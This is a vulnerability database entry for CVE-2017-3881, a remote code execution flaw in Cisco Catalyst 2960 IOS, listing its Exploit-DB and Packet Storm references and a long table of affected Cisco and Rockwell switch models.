Details of VAR-E-201703-0008

ID

VAR-E-201703-0008

CVE

cve_id:

CVE-2017-3881

Trust: 2.3

sources: BID: 96960 // PACKETSTORM: 142132 // PACKETSTORM: 142121 // EXPLOIT-DB: 42122

EDB ID

42122

TITLE

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution - Hardware remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 42122

DESCRIPTION

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881 . remote exploit for Hardware platform

Trust: 1.0

sources: EXPLOIT-DB: 42122

AFFECTED PRODUCTS

vendor:	cisco	model:	catalyst ios 12.2 se1	scope:	eq	version:	2960	Trust: 1.5
vendor:	cisco	model:	catalyst ios 12.2 se11	scope:	eq	version:	2960	Trust: 0.5
vendor:	rockwell	model:	automation allen-bradley stratix modular managed industrial ethernet s 15.2 ea.fc4	scope:	eq	version:	8000	Trust: 0.3
vendor:	rockwell	model:	automation allen-bradley stratix industrial managed ethernet switches 15.2 ea.fc4	scope:	eq	version:	5700	Trust: 0.3
vendor:	rockwell	model:	automation allen-bradley stratix industrial distribution switches 15.2 ea.fc4	scope:	eq	version:	5410	Trust: 0.3
vendor:	rockwell	model:	automation allen-bradley stratix industrial ethernet switches 15.2 ea.fc4	scope:	eq	version:	5400	Trust: 0.3
vendor:	rockwell	model:	automation allen-bradley armorstratix industrial managed ethernet swit 15.2 ea.fc4	scope:	eq	version:	5700	Trust: 0.3
vendor:	cisco	model:	sm-x layer etherswitch service module	scope:	eq	version:	2/30	Trust: 0.3
vendor:	cisco	model:	rf gateway	scope:	eq	version:	100	Trust: 0.3
vendor:	cisco	model:	me 4924-10ge switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ios xe 15.0 se10	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	ios 15.0 se10	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	ie-5000-16s12p industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-5000-12s12p-10g industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4010-4s24p industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4010-16s12p industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-8t4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-8s4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-8gt8gp4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-8gt4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-8gs4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-4tc4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-4t4p4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-4s8p4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-4gs8gp4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-4gc4gp4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-16t4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-4000-16gt4g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-3010-24tc industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie-3010-16s-8pc industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 3000-8tc industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 3000-4tc industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-8tc-g-n industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-8tc-g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-8tc-g industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-8tc industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-8t67p industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-8t67 industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-4ts-g industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-4ts industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-4t-g industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-4t industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-4s-ts-g industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-24t67 industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-16tc-g-x industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-16tc-g-n industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-16tc-g-e industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-16tc-g industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-16tc industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-16t67p industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-16t67 industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ie 2000-16ptc-g industrial ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	gigabit ethernet switch module for hp	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	enhanced layer etherswitch service module	scope:	eq	version:	2/30	Trust: 0.3
vendor:	cisco	model:	enhanced layer etherswitch service module	scope:	eq	version:	20	Trust: 0.3
vendor:	cisco	model:	embedded service ncp switch	scope:	eq	version:	20200	Trust: 0.3
vendor:	cisco	model:	embedded service ncp b switch	scope:	eq	version:	20200	Trust: 0.3
vendor:	cisco	model:	embedded service con switch	scope:	eq	version:	20200	Trust: 0.3
vendor:	cisco	model:	embedded service con b switch	scope:	eq	version:	20200	Trust: 0.3
vendor:	cisco	model:	embedded service 24tc ncp switch	scope:	eq	version:	20200	Trust: 0.3
vendor:	cisco	model:	embedded service 24tc ncp b switch	scope:	eq	version:	20200	Trust: 0.3
vendor:	cisco	model:	embedded service 24tc con switch	scope:	eq	version:	20200	Trust: 0.3
vendor:	cisco	model:	embedded service 24tc con b switch	scope:	eq	version:	20200	Trust: 0.3
vendor:	cisco	model:	catalyst switch module for ibm bladecenter	scope:	eq	version:	3110x0	Trust: 0.3
vendor:	cisco	model:	catalyst switch module for ibm bladecenter	scope:	eq	version:	31100	Trust: 0.3
vendor:	cisco	model:	catalyst switch module for ibm bladecenter	scope:	eq	version:	30120	Trust: 0.3
vendor:	cisco	model:	catalyst c2928-48tc-c switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst c2928-24lt-c switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst blade switch for dell m1000e	scope:	eq	version:	31300	Trust: 0.3
vendor:	cisco	model:	catalyst blade switch for hp	scope:	eq	version:	3120x0	Trust: 0.3
vendor:	cisco	model:	catalyst blade switch for hp	scope:	eq	version:	31200	Trust: 0.3
vendor:	cisco	model:	catalyst blade switch for fsc	scope:	eq	version:	30400	Trust: 0.3
vendor:	cisco	model:	catalyst blade switch for dell m1000e	scope:	eq	version:	30320	Trust: 0.3
vendor:	cisco	model:	catalyst blade switch for dell	scope:	eq	version:	30300	Trust: 0.3
vendor:	cisco	model:	catalyst blade switch for hp	scope:	eq	version:	30200	Trust: 0.3
vendor:	cisco	model:	catalyst 4948e-f ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 4948e ethernet switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst switch	scope:	eq	version:	49480	Trust: 0.3
vendor:	cisco	model:	catalyst gigabit ethernet switch	scope:	eq	version:	4948100	Trust: 0.3
vendor:	cisco	model:	catalyst gigabit ethernet switch	scope:	eq	version:	4928100	Trust: 0.3
vendor:	cisco	model:	catalyst 4900m switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst supervisor engine 6l-e	scope:	eq	version:	45000	Trust: 0.3
vendor:	cisco	model:	catalyst supervisor engine 6-e	scope:	eq	version:	45000	Trust: 0.3
vendor:	cisco	model:	catalyst series supervisor ii-plus-10ge	scope:	eq	version:	45000	Trust: 0.3
vendor:	cisco	model:	catalyst series supervisor engine v-10ge	scope:	eq	version:	45000	Trust: 0.3
vendor:	cisco	model:	catalyst series supervisor engine ii-plus-ts	scope:	eq	version:	45000	Trust: 0.3
vendor:	cisco	model:	catalyst series supervisor engine ii-plus	scope:	eq	version:	45000	Trust: 0.3
vendor:	cisco	model:	catalyst supervisor engine	scope:	eq	version:	4000/4500v0	Trust: 0.3
vendor:	cisco	model:	catalyst supervisor engine iv	scope:	eq	version:	4000/45000	Trust: 0.3
vendor:	cisco	model:	catalyst supervisor engine i	scope:	eq	version:	40000	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48u-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48u-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48u-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48t-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48t-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48t-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48pf-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48pf-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48pf-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48p-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48p-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-48p-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24u-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24u-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24u-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24t-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24t-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24t-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24s-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24s-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24p-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24p-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-24p-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-12s-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750x-12s-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750v2-48ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750v2-48ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750v2-24ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750v2-24ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750v2-24fs switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-48ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-48ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-24ts-1u switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-24ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-24t switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-24ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-16td switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-12s-sd switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750g-12s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-48td-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-48td-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-48pd-sf switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-48pd-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-48pd-ef switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-48pd-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-24td-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-24td-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-24pd-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750e-24pd-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750-48ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750-48ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750-24ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750-24ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3750-24fs switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst metro 24-dc switch	scope:	eq	version:	37500	Trust: 0.3
vendor:	cisco	model:	catalyst metro 24-ac switch	scope:	eq	version:	37500	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48u-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48u-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48u-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48t-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48t-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48t-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48pf-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48pf-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48pf-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48p-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48p-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-48p-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24u-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24u-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24u-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24t-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24t-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24t-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24p-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24p-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560x-24p-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560v2-48ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560v2-48ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560v2-24ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560v2-24ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560v2-24dc switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560g-48ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560g-48ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560g-24ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560g-24ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-48td-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-48td-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-48pd-sf switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-48pd-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-48pd-ef switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-48pd-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-24td-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-24td-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-24pd-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-24pd-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-12sd-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-12sd-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-12d-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560e-12d-e switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cx-8xpd-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cx-8tc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cx-8pt-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cx-8pc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cx-12tc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cx-12pd-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cx-12pc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cpd-8pt-s compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cg-8tc-s compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560cg-8pc-s compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560c-8pc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560c-12pc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560-8pc compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560-48ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560-48ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560-24ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560-24ps switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 3560-12pc-s compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst smi switch	scope:	eq	version:	3550480	Trust: 0.3
vendor:	cisco	model:	catalyst emi switch	scope:	eq	version:	3550480	Trust: 0.3
vendor:	cisco	model:	catalyst smi switch	scope:	eq	version:	3550240	Trust: 0.3
vendor:	cisco	model:	catalyst pwr switch	scope:	eq	version:	3550240	Trust: 0.3
vendor:	cisco	model:	catalyst fx smi switch	scope:	eq	version:	3550240	Trust: 0.3
vendor:	cisco	model:	catalyst emi switch	scope:	eq	version:	3550240	Trust: 0.3
vendor:	cisco	model:	catalyst dc smi switch	scope:	eq	version:	3550240	Trust: 0.3
vendor:	cisco	model:	catalyst 12t switch	scope:	eq	version:	35500	Trust: 0.3
vendor:	cisco	model:	catalyst 12g switch	scope:	eq	version:	35500	Trust: 0.3
vendor:	cisco	model:	catalyst switch	scope:	eq	version:	29750	Trust: 0.3
vendor:	cisco	model:	catalyst 2970g-24ts switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2970g-24t switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48ts-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48ts-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48td-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48td-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48lps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48lps-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48lpd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48lpd-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48fps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48fps-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48fpd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-48fpd-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-24ts-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-24ts-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-24td-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-24td-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-24ps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-24ps-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-24pd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960xr-24pd-i switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-48ts-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-48ts-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-48td-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-48lps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-48lpd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-48fps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-48fpd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-24ts-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-24ts-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-24td-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-24psq-l cool switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-24ps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960x-24pd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-f48ts-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-f48ts-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-f48lps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-f48fps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-f24ts-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-f24ts-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-f24ps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-48ts-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-48ts-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-48td-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-48lps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-48lpd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-48fps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-48fpd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-24ts-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-24ts-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-24td-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-24ps-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960s-24pd-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960pd-8tt-l compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960l-8ts-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960l-8ps-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960l-48ts-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960l-48ps-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960l-24ts-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960l-24ps-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960l-16ts-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960l-16ps-ll switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960g-8tc-l compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960g-48tc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960g-24tc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960cx-8tc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960cx-8pc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960cpd-8tt-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960cpd-8pt-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960cg-8tc-l compact switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960c-8tc-s switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960c-8tc-l switch	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	catalyst 2960c-8pc-l switch	scope:	eq	version:	0	Trust: 0.3
